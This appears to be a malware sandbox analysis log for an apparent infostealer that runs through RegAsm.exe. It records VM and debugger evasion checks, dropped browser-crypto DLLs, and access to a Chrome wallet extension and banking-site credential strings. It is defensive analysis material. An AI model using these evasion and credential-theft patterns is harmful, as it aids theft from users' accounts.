Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Source: C:\Users\user\Desktop\file.exe Memory allocated: 1740000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\file.exe Memory allocated: 32C0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\file.exe Memory allocated: 3060000 memory reserve | memory write watch
Source: C:\Users\userFBKFCFBFID.exe Memory allocated: 1410000 memory reserve | memory write watch
Source: C:\Users\userFBKFCFBFID.exe Memory allocated: 2E90000 memory reserve | memory write watch
Source: C:\Users\userFBKFCFBFID.exe Memory allocated: 1410000 memory reserve | memory write watch
Source: C:\Users\userIEHDAFHDHC.exe Memory allocated: F00000 memory reserve | memory write watch
Source: C:\Users\userIEHDAFHDHC.exe Memory allocated: 28B0000 memory reserve | memory write watch
Source: C:\Users\userIEHDAFHDHC.exe Memory allocated: 48B0000 memory reserve | memory write watch
Source: C:\ProgramData\DHCGHDHIDH.exe Memory allocated: 16C0000 memory reserve | memory write watch
Source: C:\ProgramData\DHCGHDHIDH.exe Memory allocated: 3040000 memory reserve | memory write watch
Source: C:\ProgramData\DHCGHDHIDH.exe Memory allocated: 5040000 memory reserve | memory write watch
Source: C:\ProgramData\HDAFIIDAKJ.exe Memory allocated: 980000 memory reserve | memory write watch
Source: C:\ProgramData\HDAFIIDAKJ.exe Memory allocated: 24B0000 memory reserve | memory write watch
Source: C:\ProgramData\HDAFIIDAKJ.exe Memory allocated: 44B0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\userFBKFCFBFID.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\userIEHDAFHDHC.exe Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\DHCGHDHIDH.exe Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\HDAFIIDAKJ.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\vcruntime140[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\freebl3[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\msvcp140[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\nss3[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\softokn3[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\sql[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\vcruntime140[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\softokn3[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\mozglue[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\freebl3[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\nss3[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\mozglue[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API coverage: 6.8 %
Source: C:\Users\user\Desktop\file.exe TID: 7476 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\userFBKFCFBFID.exe TID: 5380 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7220 Thread sleep time: -30000s >= -30000s
Source: C:\Users\userIEHDAFHDHC.exe TID: 1204 Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\DHCGHDHIDH.exe TID: 5484 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908 Thread sleep time: -30000s >= -30000s
Source: C:\ProgramData\HDAFIIDAKJ.exe TID: 6844 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 5144 Thread sleep count: 80 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0040D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 3_2_0040D8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0040F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 3_2_0040F4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0040BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 3_2_0040BCB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004139B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 3_2_004139B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0040E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 3_2_0040E270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 3_2_00401710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004143F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 3_2_004143F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0040DC50 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 3_2_0040DC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00414050 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA, 3_2_00414050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0040EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose, 3_2_0040EB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004133C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose, 3_2_004133C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_00413540 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,memset,lstrcatA,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose, 29_2_00413540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_0040B969 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 29_2_0040B969
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_0041425C wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 29_2_0041425C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_00413B50 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 29_2_00413B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_00409B68 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA, 29_2_00409B68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_0040AB08 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 29_2_0040AB08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_00409317 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 29_2_00409317
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_004013B4 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose, 29_2_004013B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_00409645 StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 29_2_00409645
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_0040A2C1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose, 29_2_0040A2C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_00413EA0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 29_2_00413EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_0041391C GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA, 29_2_0041391C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00401160 GetSystemInfo,ExitProcess, 3_2_00401160
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\userFBKFCFBFID.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\userIEHDAFHDHC.exe Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\DHCGHDHIDH.exe Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\HDAFIIDAKJ.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: Amcache.hve.33.dr Binary or memory string: VMware
Source: AAFIDG.29.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: AAFIDG.29.dr Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: RegAsm.exe, 00000018.00000002.1483311475.00000000011CA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW{
Source: AAFIDG.29.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: AAFIDG.29.dr Binary or memory string: outlook.office.comVMware20,11696492231s
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware9
Source: AAFIDG.29.dr Binary or memory string: AMC password management pageVMware20,11696492231
Source: Amcache.hve.33.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: AAFIDG.29.dr Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: AAFIDG.29.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: RegAsm.exe, 00000003.00000002.1384359989.000000000146D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.1483311475.00000000011CA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1929039688.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.1938989194.0000000000DB6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.1938989194.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.2206607255.0000000000EDB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.2206607255.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: AAFIDG.29.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: AAFIDG.29.dr Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: Amcache.hve.33.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: AAFIDG.29.dr Binary or memory string: discord.comVMware20,11696492231f
Source: Amcache.hve.33.dr Binary or memory string: vmci.sys
Source: AAFIDG.29.dr Binary or memory string: global block list test formVMware20,11696492231
Source: AAFIDG.29.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: AAFIDG.29.dr Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: AAFIDG.29.dr Binary or memory string: tasks.office.comVMware20,11696492231o
Source: Amcache.hve.33.dr Binary or memory string: VMware20,1
Source: Amcache.hve.33.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.33.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.33.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: RegAsm.exe, 0000002E.00000002.2206607255.0000000000EDB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: AAFIDG.29.dr Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: Amcache.hve.33.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.33.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.33.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: AAFIDG.29.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: Amcache.hve.33.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.33.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.33.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: AAFIDG.29.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: Amcache.hve.33.dr Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: AAFIDG.29.dr Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: AAFIDG.29.dr Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: AAFIDG.29.dr Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: Amcache.hve.33.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: AAFIDG.29.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: Amcache.hve.33.dr Binary or memory string: VMware Virtual USB Mouse
Source: AAFIDG.29.dr Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: Amcache.hve.33.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.33.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.33.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.33.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: AAFIDG.29.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: Amcache.hve.33.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.33.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: RegAsm.exe, 00000003.00000002.1384359989.000000000140A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`#G
Source: AAFIDG.29.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: AAFIDG.29.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: AAFIDG.29.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: Amcache.hve.33.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.33.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWpK
Source: AAFIDG.29.dr Binary or memory string: dev.azure.comVMware20,11696492231j
Source: AAFIDG.29.dr Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: Amcache.hve.33.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.33.dr Binary or memory string: \driver\vmci,\driver\pci
Source: AAFIDG.29.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: Amcache.hve.33.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.33.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: RegAsm.exe, 00000018.00000002.1483311475.0000000001196000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWh3
Source: RegAsm.exe, 00000029.00000002.1938989194.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWL
Source: AAFIDG.29.dr Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: RegAsm.exe, 00000003.00000002.1384359989.000000000146D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWA
Source: AAFIDG.29.dr Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information queried: ProcessInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0043C800 LdrInitializeThunk, 24_2_0043C800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_0041ACFA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00404610 VirtualProtect ?,00000004,00000100,00000000 3_2_00404610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004195E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress